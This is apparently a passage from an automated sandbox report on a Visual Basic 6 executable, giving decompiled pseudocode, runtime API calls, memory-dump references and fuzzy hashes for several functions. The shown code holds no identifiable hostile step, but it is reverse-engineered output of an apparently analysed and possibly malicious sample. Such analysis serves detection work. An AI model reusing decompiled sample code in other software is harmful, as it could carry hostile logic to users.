                                  • #613.MSVBVM60(?,00000002,?,?,?,?,?,?,?,?,004014F6), ref: 00410C2D
                                  • __vbaStrVarMove.MSVBVM60(?,?,00000002,?,?,?,?,?,?,?,?,004014F6), ref: 00410C36
                                  • __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?,?,?,?,?,?,004014F6), ref: 00410C40
                                  • __vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,?,00000002,?,?,?,?,?,?,?,?,004014F6), ref: 00410C4F
                                  • __vbaFreeStr.MSVBVM60(00410C8A), ref: 00410C74
                                  • __vbaFreeStr.MSVBVM60(00410C8A), ref: 00410C7C
                                  • __vbaFreeStr.MSVBVM60(00410C8A), ref: 00410C84
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.306336879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000001.00000002.306331990.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306362793.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306371664.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$Free$CopyMove$#613ChkstkList
                                  • String ID:
                                  • API String ID: 2801890994-0
                                  • Opcode ID: e3aee29ffae1e9f711958cd22b4c560d56d43a412794d1b8f6409c1af07407cc
                                  • Instruction ID: 1d404a9818cc7b44b41b72f283dd4306b9f9163d08767cf0bf09f482571da548
                                  • Opcode Fuzzy Hash: e3aee29ffae1e9f711958cd22b4c560d56d43a412794d1b8f6409c1af07407cc
                                  • Instruction Fuzzy Hash: 9C115171C00108ABDB04EB95CD46EEEB77CEB44704F54852FF501771E1EB7969058B58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004101B7, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 53%
                                  			E004101B7(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				void* _v28;
				char _v32;
				intOrPtr* _v36;
				signed int _v40;
				intOrPtr* _v44;
				signed int _v48;
				char _v56;
				signed int _v60;
				signed int _v64;
				signed int _t41;
				signed int _t46;
				intOrPtr _t55;

				_push(0x4014f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t55;
				_push(0x2c);
				L004014F0();
				_v12 = _t55;
				_v8 = 0x4012d0;
				if( *0x41333c != 0) {
					_v56 = 0x41333c;
				} else {
					_push(0x41333c);
					_push(0x402774);
					L004016B8();
					_v56 = 0x41333c;
				}
				_t5 =  &_v56; // 0x41333c
				_v36 =  *((intOrPtr*)( *_t5));
				_t41 =  *((intOrPtr*)( *_v36 + 0x14))(_v36,  &_v28);
				asm("fclex");
				_v40 = _t41;
				if(_v40 >= 0) {
					_v60 = _v60 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x402764);
					_push(_v36);
					_push(_v40);
					L004016B2();
					_v60 = _t41;
				}
				_v44 = _v28;
				_t46 =  *((intOrPtr*)( *_v44 + 0x118))(_v44,  &_v32);
				asm("fclex");
				_v48 = _t46;
				if(_v48 >= 0) {
					_v64 = _v64 & 0x00000000;
				} else {
					_push(0x118);
					_push(0x402784);
					_push(_v44);
					_push(_v48);
					L004016B2();
					_v64 = _t46;
				}
				L00401664();
				_v24 = _t46;
				L004016AC();
				_push(0x4102af);
				return _t46;
			}


















                                  0x004101bc
                                  0x004101c7
                                  0x004101c8
                                  0x004101cf
                                  0x004101d2
                                  0x004101da
                                  0x004101dd
                                  0x004101eb
                                  0x00410205
                                  0x004101ed
                                  0x004101ed
                                  0x004101f2
                                  0x004101f7
                                  0x004101fc
                                  0x004101fc
                                  0x0041020c
                                  0x00410211
                                  0x00410220
                                  0x00410223
                                  0x00410225
                                  0x0041022c
                                  0x00410245
                                  0x0041022e
                                  0x0041022e
                                  0x00410230
                                  0x00410235
                                  0x00410238
                                  0x0041023b
                                  0x00410240
                                  0x00410240
                                  0x0041024c
                                  0x0041025b
                                  0x00410261
                                  0x00410263
                                  0x0041026a
                                  0x00410286
                                  0x0041026c
                                  0x0041026c
                                  0x00410271
                                  0x00410276
                                  0x00410279
                                  0x0041027c
                                  0x00410281
                                  0x00410281
                                  0x0041028d
                                  0x00410292
                                  0x00410299
                                  0x0041029e
                                  0x00000000

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 004101D2
                                  • __vbaNew2.MSVBVM60(00402774,0041333C,?,?,?,?,004014F6), ref: 004101F7
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402764,00000014,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 0041023B
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402784,00000118,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 0041027C
                                  • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 0041028D
                                  • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 00410299
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.306336879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000001.00000002.306331990.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306362793.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306371664.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$CheckHresult$ChkstkFreeNew2
                                  • String ID: <3A
                                  • API String ID: 1616694062-662753744
                                  • Opcode ID: f4c2b943e92a118010aca36917e27aeb6fd5604dda262a55bbb80292fa555674
                                  • Instruction ID: ce45d081ab4977b523e397d9f6bdc255ed16eb42df9e0a0faacb5ab1eb998a68
                                  • Opcode Fuzzy Hash: f4c2b943e92a118010aca36917e27aeb6fd5604dda262a55bbb80292fa555674
                                  • Instruction Fuzzy Hash: 4B31C571D40208EFCF04DF95C989FDEBBB5AB08714F10816AF101B72A1DBB959809F69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411C88, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 37COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 72%
                                  			E00411C88(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				char _v48;
				char* _t18;
				void* _t26;
				void* _t28;
				intOrPtr _t29;

				_t29 = _t28 - 0xc;
				 *[fs:0x0] = _t29;
				L004014F0();
				_v16 = _t29;
				_v12 = 0x401418;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x20,  *[fs:0x0], 0x4014f6, _t26);
				_push(L"10:10:10");
				_push( &_v48);
				L00401592();
				_t18 =  &_v48;
				_push(_t18);
				L004015F8();
				L0040161C();
				L0040167C();
				_push(0x411d0a);
				L0040169A();
				return _t18;
			}












                                  0x00411c8b
                                  0x00411c9a
                                  0x00411ca4
                                  0x00411cac
                                  0x00411caf
                                  0x00411cb6
                                  0x00411cc5
                                  0x00411cc8
                                  0x00411cd0
                                  0x00411cd1
                                  0x00411cd6
                                  0x00411cd9
                                  0x00411cda
                                  0x00411ce4
                                  0x00411cec
                                  0x00411cf1
                                  0x00411d04
                                  0x00411d09

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 00411CA4
                                  • #541.MSVBVM60(?,10:10:10,?,?,?,?,004014F6), ref: 00411CD1
                                  • __vbaStrVarMove.MSVBVM60(?,?,10:10:10,?,?,?,?,004014F6), ref: 00411CDA
                                  • __vbaStrMove.MSVBVM60(?,?,10:10:10,?,?,?,?,004014F6), ref: 00411CE4
                                  • __vbaFreeVar.MSVBVM60(?,?,10:10:10,?,?,?,?,004014F6), ref: 00411CEC
                                  • __vbaFreeStr.MSVBVM60(00411D0A,?,?,10:10:10,?,?,?,?,004014F6), ref: 00411D04
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.306336879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000001.00000002.306331990.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306362793.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306371664.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$FreeMove$#541Chkstk
                                  • String ID: 10:10:10
                                  • API String ID: 296236968-2228564956
                                  • Opcode ID: 67438803039c70249995cc8707c2088ad1780723d2d942b93ecb8d6c10f3fed0
                                  • Instruction ID: 70177c36a9dd9c74bb8892ce05d01f262b11b0314787e962aedc61b3e8726e64
                                  • Opcode Fuzzy Hash: 67438803039c70249995cc8707c2088ad1780723d2d942b93ecb8d6c10f3fed0
                                  • Instruction Fuzzy Hash: EB016271900208ABCB00EBA5C946FDEBB78AF44704F50843AF101B71E2D778A5048B98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411D31, Relevance: 12.1, APIs: 8, Instructions: 91COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 51%
                                  			E00411D31(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v36;
				intOrPtr _v60;
				char _v68;
				signed int _v72;
				char _v80;
				signed int _v84;
				void* _t26;
				signed int _t29;
				signed int _t30;
				intOrPtr _t39;

				_push(__ecx);
				_push(__ecx);
				_push(0x4014f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t39;
				_t26 = 0x40;
				L004014F0();
				_v12 = _t39;
				_v8 = 0x401460;
				_push(0x402e08);
				L00401586();
				_push(_t26);
				_push( &_v36);
				L0040158C();
				_v60 = 0x402e14;
				_v68 = 0x8008;
				_push( &_v36);
				_t29 =  &_v68;
				_push(_t29);
				L00401688();
				_v72 = _t29;
				L0040167C();
				_t30 = _v72;
				if(_t30 == 0) {
					L9:
					asm("wait");
					_push(0x411e7d);
					return _t30;
				} else {
					__fp0 =  *0x401458;
					_push(__ecx);
					 *__esp =  *0x401458;
					__fp0 =  *0x401450;
					__fp0 =  *0x401450 *  *0x401448;
					if( *0x413000 != 0) {
						_push( *0x4012f4);
						_push( *0x4012f0);
						L00401514();
					} else {
						__fp0 = __fp0 /  *0x4012f0;
					}
					asm("fnstsw ax");
					if((__al & 0x0000000d) != 0) {
						goto L1;
					} else {
						_v80 = __fp0;
						__fp0 = _v80;
						_v68 = _v80;
						__fp0 =  *0x401440;
						_v72 =  *0x401440;
						__fp0 =  *0x401438;
						L00401580();
						__fp0 =  *0x401430;
						_v80 =  *0x401430;
						__fp0 =  *0x40142c;
						_v84 =  *0x40142c;
						__fp0 =  *0x401428;
						 *__esp =  *0x401428;
						_a4 =  *_a4;
						__eax =  *((intOrPtr*)( *_a4 + 0x2c0))(_a4, 0x1c2, __ecx, __ecx, __ecx, __eax, __ecx, __ecx);
						asm("fclex");
						_v72 = __eax;
						if(_v72 >= 0) {
							_v84 = _v84 & 0x00000000;
						} else {
							_push(0x2c0);
							_push(0x40256c);
							_push(_a4);
							_push(_v72);
							L004016B2();
							_v84 = __eax;
						}
						goto L9;
					}
				}
				L1:
				return __imp____vbaFPException();
			}















                                  0x00411d34
                                  0x00411d35
                                  0x00411d36
                                  0x00411d41
                                  0x00411d42
                                  0x00411d4b
                                  0x00411d4c
                                  0x00411d54
                                  0x00411d57
                                  0x00411d5e
                                  0x00411d63
                                  0x00411d68
                                  0x00411d6c
                                  0x00411d6d
                                  0x00411d72
                                  0x00411d79
                                  0x00411d83
                                  0x00411d84
                                  0x00411d87
                                  0x00411d88
                                  0x00411d8d
                                  0x00411d94
                                  0x00411d99
                                  0x00411d9f
                                  0x00411e61
                                  0x00411e61
                                  0x00411e62
                                  0x00000000
                                  0x00411da5
                                  0x00411da5
                                  0x00411dab
                                  0x00411dac
                                  0x00411daf
                                  0x00411db5
                                  0x00411dc2
                                  0x00411dcc
                                  0x00411dd2
                                  0x00411dd8
                                  0x00411dc4
                                  0x00411dc4
                                  0x00411dc4
                                  0x00411ddd
                                  0x00411de1
                                  0x00000000
                                  0x00411de7
                                  0x00411de7
                                  0x00411dea
                                  0x00411dee
                                  0x00411df1
                                  0x00411df8
                                  0x00411dfb
                                  0x00411e01
                                  0x00411e07
                                  0x00411e0e
                                  0x00411e11
                                  0x00411e18
                                  0x00411e1b
                                  0x00411e22
                                  0x00411e2d
                                  0x00411e32
                                  0x00411e38
                                  0x00411e3a
                                  0x00411e41
                                  0x00411e5d
                                  0x00411e43
                                  0x00411e43
                                  0x00411e48
                                  0x00411e4d
                                  0x00411e50
                                  0x00411e53
                                  0x00411e58
                                  0x00411e58
                                  0x00000000
                                  0x00411e41
                                  0x00411de1
                                  0x004014fc
                                  0x004014fc

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 00411D4C
                                  • __vbaI4Str.MSVBVM60(00402E08,?,?,?,?,004014F6), ref: 00411D63
                                  • #698.MSVBVM60(?,00000000,00402E08,?,?,?,?,004014F6), ref: 00411D6D
                                  • __vbaVarTstNe.MSVBVM60(00008008,?,?,?,?,?,?,?,?,00000000,00402E08,?,?,?,?,004014F6), ref: 00411D88
                                  • __vbaFreeVar.MSVBVM60(00008008,?,?,?,?,?,?,?,?,00000000,00402E08,?,?,?,?,004014F6), ref: 00411D94
                                  • _adj_fdiv_m64.MSVBVM60(?,00008008,?,?,?,?,?,?,?,?,00000000,00402E08), ref: 00411DD8
                                  • __vbaFpI4.MSVBVM60(?,?,?,00008008,?,?,?,?,?,?,?,?,00000000,00402E08), ref: 00411E01
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040256C,000002C0,?,?,?,00000000,?,?,?,00008008,?), ref: 00411E53
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.306336879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000001.00000002.306331990.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306362793.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306371664.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$#698CheckChkstkFreeHresult_adj_fdiv_m64
                                  • String ID:
                                  • API String ID: 366650499-0
                                  • Opcode ID: 606358526369257ae14667f3d6c623fe183abc79d544f86a87e33c5268289803
                                  • Instruction ID: 8a7bb222f742dc92570c21999b1647394b0e5b265805cd30d86508530e004e62
                                  • Opcode Fuzzy Hash: 606358526369257ae14667f3d6c623fe183abc79d544f86a87e33c5268289803
                                  • Instruction Fuzzy Hash: 03315871900209EFCB00AF91DD49AAEBBB8FB08744F40492EF581B61B0C778A551DB6D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410448, Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 46%
                                  			E00410448(void* __ebx, void* __edi, void* __esi, void* __eflags, long long __fp0, intOrPtr* _a4, void* _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				long long* _v16;
				char _v36;
				void* _v40;
				signed int _v44;
				signed int _v56;
				signed int _t27;
				char* _t32;
				void* _t39;
				void* _t41;
				long long* _t42;

				_t42 = _t41 - 0xc;
				 *[fs:0x0] = _t42;
				L004014F0();
				_v16 = _t42;
				_v12 = 0x401300;
				_v8 = 0;
				_t27 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x20,  *[fs:0x0], 0x4014f6, _t39);
				L004016A6();
				_t32 =  &_v36;
				L004016A6();
				asm("fld1");
				_push(_t32);
				_push(_t32);
				 *_t42 = __fp0;
				asm("fld1");
				_push(_t32);
				_push(_t32);
				_v56 = __fp0;
				asm("fld1");
				_push(_t32);
				_push(_t32);
				 *_t42 = __fp0;
				_push(_t32);
				_push(_t32);
				 *_t42 =  *0x4012f8;
				L00401640();
				L00401646();
				asm("fcomp qword [0x4012f0]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags != 0) {
					_t27 =  *((intOrPtr*)( *_a4 + 0x254))(_a4, 0x4cf5);
					asm("fclex");
					_v44 = _t27;
					if(_v44 >= 0) {
						_t19 =  &_v56;
						 *_t19 = _v56 & 0x00000000;
						__eflags =  *_t19;
					} else {
						_push(0x254);
						_push(0x40256c);
						_push(_a4);
						_push(_v44);
						L004016B2();
						_v56 = _t27;
					}
				}
				asm("wait");
				_push(0x410526);
				L0040169A();
				L0040169A();
				return _t27;
			}















                                  0x0041044b
                                  0x0041045a
                                  0x00410464
                                  0x0041046c
                                  0x0041046f
                                  0x00410476
                                  0x00410485
                                  0x0041048e
                                  0x00410496
                                  0x00410499
                                  0x0041049e
                                  0x004104a0
                                  0x004104a1
                                  0x004104a2
                                  0x004104a5
                                  0x004104a7
                                  0x004104a8
                                  0x004104a9
                                  0x004104ac
                                  0x004104ae
                                  0x004104af
                                  0x004104b0
                                  0x004104b9
                                  0x004104ba
                                  0x004104bb
                                  0x004104be
                                  0x004104c3
                                  0x004104c8
                                  0x004104ce
                                  0x004104d0
                                  0x004104d1
                                  0x004104e0
                                  0x004104e6
                                  0x004104e8
                                  0x004104ef
                                  0x0041050b
                                  0x0041050b
                                  0x0041050b
                                  0x004104f1
                                  0x004104f1
                                  0x004104f6
                                  0x004104fb
                                  0x004104fe
                                  0x00410501
                                  0x00410506
                                  0x00410506
                                  0x004104ef
                                  0x0041050f
                                  0x00410510
                                  0x00410518
                                  0x00410520
                                  0x00410525

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 00410464
                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004014F6), ref: 0041048E
                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004014F6), ref: 00410499
                                  • #672.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 004104BE
                                  • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 004104C3
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401300,0040256C,00000254), ref: 00410501
                                  • __vbaFreeStr.MSVBVM60(00410526,?,?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 00410518
                                  • __vbaFreeStr.MSVBVM60(00410526,?,?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 00410520
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.306336879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000001.00000002.306331990.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306362793.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306371664.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$CopyFree$#672CheckChkstkHresult
                                  • String ID:
                                  • API String ID: 1189013271-0
                                  • Opcode ID: 68a075349237dc6e7bfe4570351c4030a0e507eaaaa430859b1c48dc1e703217
                                  • Instruction ID: 4fefe632ec9cdeb1b46b496af8ebe68f2ad6c5a8b8d29633aa7702ac6a0dc270
                                  • Opcode Fuzzy Hash: 68a075349237dc6e7bfe4570351c4030a0e507eaaaa430859b1c48dc1e703217
                                  • Instruction Fuzzy Hash: F2214870400509BFDB00EF91CD8AEEEBBB5EF04744F04456EF441762A1CBB95A848B68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410FE9, Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E00410FE9(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				intOrPtr _v32;
				char _v44;
				char _v60;
				signed int _v64;
				signed int _v76;
				signed int _t34;
				char* _t35;
				void* _t44;
				void* _t46;
				intOrPtr _t47;

				_t47 = _t46 - 0xc;
				 *[fs:0x0] = _t47;
				L004014F0();
				_v16 = _t47;
				_v12 = 0x401388;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x34,  *[fs:0x0], 0x4014f6, _t44);
				L004016A6();
				_t34 =  *((intOrPtr*)( *_a4 + 0x150))(_a4,  &_v44);
				asm("fclex");
				_v64 = _t34;
				if(_v64 >= 0) {
					_v76 = _v76 & 0x00000000;
				} else {
					_push(0x150);
					_push(0x40256c);
					_push(_a4);
					_push(_v64);
					L004016B2();
					_v76 = _t34;
				}
				_push(0);
				_push(0);
				_push(_v44);
				_t35 =  &_v60;
				_push(_t35);
				L0040166A();
				_push(_t35);
				L004015D4();
				_v32 = _t35;
				L004016AC();
				L0040167C();
				_push(0x4110bc);
				L0040169A();
				return _t35;
			}

















                                  0x00410fec
                                  0x00410ffb
                                  0x00411005
                                  0x0041100d
                                  0x00411010
                                  0x00411017
                                  0x00411026
                                  0x0041102f
                                  0x00411040
                                  0x00411046
                                  0x00411048
                                  0x0041104f
                                  0x0041106b
                                  0x00411051
                                  0x00411051
                                  0x00411056
                                  0x0041105b
                                  0x0041105e
                                  0x00411061
                                  0x00411066
                                  0x00411066
                                  0x0041106f
                                  0x00411071
                                  0x00411073
                                  0x00411076
                                  0x00411079
                                  0x0041107a
                                  0x00411082
                                  0x00411083
                                  0x00411088
                                  0x0041108e
                                  0x00411096
                                  0x0041109b
                                  0x004110b6
                                  0x004110bb

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 00411005
                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004014F6), ref: 0041102F
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401388,0040256C,00000150), ref: 00411061
                                  • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0041107A
                                  • __vbaI4Var.MSVBVM60(00000000,?,?,?,004014F6), ref: 00411083
                                  • __vbaFreeObj.MSVBVM60(00000000,?,?,?,004014F6), ref: 0041108E
                                  • __vbaFreeVar.MSVBVM60(00000000,?,?,?,004014F6), ref: 00411096
                                  • __vbaFreeStr.MSVBVM60(004110BC,00000000,?,?,?,004014F6), ref: 004110B6
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.306336879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000001.00000002.306331990.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306362793.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306371664.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$Free$CallCheckChkstkCopyHresultLate
                                  • String ID:
                                  • API String ID: 2821350654-0
                                  • Opcode ID: c559130d7d9b285dc6a09be20c9afbdea46d8509090d539f4bd6517fe25e818b
                                  • Instruction ID: 879a55eba13c81c5e516b23c975bcf8c653bc826697e2efcb8378a7f7bfbfb0b
                                  • Opcode Fuzzy Hash: c559130d7d9b285dc6a09be20c9afbdea46d8509090d539f4bd6517fe25e818b
                                  • Instruction Fuzzy Hash: 1A21E574900209ABCB00EFA5CC4AFDDBFB4AF08744F54442AF501BB2A1DB79A585CF98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040FD88, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 49%
                                  			E0040FD88(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v28;
				intOrPtr* _v32;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				char _v52;
				signed int _v56;
				signed int _v60;
				signed int _t38;
				signed int _t42;
				intOrPtr _t50;

				_push(0x4014f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t50;
				_push(0x28);
				L004014F0();
				_v12 = _t50;
				_v8 = 0x401278;
				if( *0x41333c != 0) {
					_v52 = 0x41333c;
				} else {
					_push(0x41333c);
					_push(0x402774);
					L004016B8();
					_v52 = 0x41333c;
				}
				_t5 =  &_v52; // 0x41333c
				_v32 =  *((intOrPtr*)( *_t5));
				_t38 =  *((intOrPtr*)( *_v32 + 0x4c))(_v32,  &_v28);
				asm("fclex");
				_v36 = _t38;
				if(_v36 >= 0) {
					_v56 = _v56 & 0x00000000;
				} else {
					_push(0x4c);
					_push(0x402764);
					_push(_v32);
					_push(_v36);
					L004016B2();
					_v56 = _t38;
				}
				_v40 = _v28;
				_t42 =  *((intOrPtr*)( *_v40 + 0x28))(_v40);
				asm("fclex");
				_v44 = _t42;
				if(_v44 >= 0) {
					_v60 = _v60 & 0x00000000;
				} else {
					_push(0x28);
					_push(0x402b80);
					_push(_v40);
					_push(_v44);
					L004016B2();
					_v60 = _t42;
				}
				L004016AC();
				asm("wait");
				_push(0x40fe6b);
				return _t42;
			}
















                                  0x0040fd8d
                                  0x0040fd98
                                  0x0040fd99
                                  0x0040fda0
                                  0x0040fda3
                                  0x0040fdab
                                  0x0040fdae
                                  0x0040fdbc
                                  0x0040fdd6
                                  0x0040fdbe
                                  0x0040fdbe
                                  0x0040fdc3
                                  0x0040fdc8
                                  0x0040fdcd
                                  0x0040fdcd
                                  0x0040fddd
                                  0x0040fde2
                                  0x0040fdf1
                                  0x0040fdf4
                                  0x0040fdf6
                                  0x0040fdfd
                                  0x0040fe16
                                  0x0040fdff
                                  0x0040fdff
                                  0x0040fe01
                                  0x0040fe06
                                  0x0040fe09
                                  0x0040fe0c
                                  0x0040fe11
                                  0x0040fe11
                                  0x0040fe1d
                                  0x0040fe28
                                  0x0040fe2b
                                  0x0040fe2d
                                  0x0040fe34
                                  0x0040fe4d
                                  0x0040fe36
                                  0x0040fe36
                                  0x0040fe38
                                  0x0040fe3d
                                  0x0040fe40
                                  0x0040fe43
                                  0x0040fe48
                                  0x0040fe48
                                  0x0040fe54
                                  0x0040fe59
                                  0x0040fe5a
                                  0x00000000

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 0040FDA3
                                  • __vbaNew2.MSVBVM60(00402774,0041333C,?,?,?,?,004014F6), ref: 0040FDC8
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402764,0000004C,?,?,?,?,?,?,?,?,?,004014F6), ref: 0040FE0C
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402B80,00000028,?,?,?,?,?,?,?,?,?,004014F6), ref: 0040FE43
                                  • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 0040FE54
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.306336879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000001.00000002.306331990.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306362793.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306371664.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$CheckHresult$ChkstkFreeNew2
                                  • String ID: <3A
                                  • API String ID: 1616694062-662753744
                                  • Opcode ID: 7d0e6b4c713f8eb7bebf9861fa3f96141fb81a682c59a5cdd23593c2362f6587
                                  • Instruction ID: aa01deedd266ebe5af65db3e013963588258000348f068dde093880586b7f700
                                  • Opcode Fuzzy Hash: 7d0e6b4c713f8eb7bebf9861fa3f96141fb81a682c59a5cdd23593c2362f6587
                                  • Instruction Fuzzy Hash: 5F21D370941208EFCF10AF95C989FDEBBB4BB08715F10453AF401B62A1C77969859BA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040FF08, Relevance: 10.6, APIs: 7, Instructions: 68COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 40%
                                  			E0040FF08(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, void* _a36) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				char _v40;
				intOrPtr _v64;
				char _v72;
				signed int _v76;
				signed long long _v84;
				signed int _v88;
				signed int _t32;
				signed int _t33;
				intOrPtr _t45;

				_push(__ecx);
				_push(__ecx);
				_push(0x4014f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t45;
				_push(0x44);
				L004014F0();
				_v12 = _t45;
				_v8 = 0x4012a0;
				L004016A6();
				_push(1);
				_push( &_v40);
				L00401682();
				_v64 = 0x4029d8;
				_v72 = 0x8008;
				_push( &_v40);
				_t32 =  &_v72;
				_push(_t32);
				L00401688();
				_v76 = _t32;
				L0040167C();
				_t33 = _v76;
				if(_t33 != 0) {
					__fp0 =  *0x401298;
					__fp0 =  *0x401298 *  *0x401290;
					asm("fnstsw ax");
					if((__al & 0x0000000d) != 0) {
						return __imp____vbaFPException();
					}
					_v84 = __fp0;
					__fp0 = _v84;
					 *__esp = _v84;
					_a4 =  *_a4;
					__eax =  *((intOrPtr*)( *_a4 + 0x84))(_a4, __ecx);
					asm("fclex");
					_v76 = __eax;
					if(_v76 >= 0) {
						_v88 = _v88 & 0x00000000;
					} else {
						_push(0x84);
						_push(0x40256c);
						_push(_a4);
						_push(_v76);
						L004016B2();
						_v88 = __eax;
					}
				}
				asm("wait");
				_push(0x40fff1);
				L0040169A();
				return _t33;
			}















                                  0x0040ff0b
                                  0x0040ff0c
                                  0x0040ff0d
                                  0x0040ff18
                                  0x0040ff19
                                  0x0040ff20
                                  0x0040ff23
                                  0x0040ff2b
                                  0x0040ff2e
                                  0x0040ff3b
                                  0x0040ff40
                                  0x0040ff45
                                  0x0040ff46
                                  0x0040ff4b
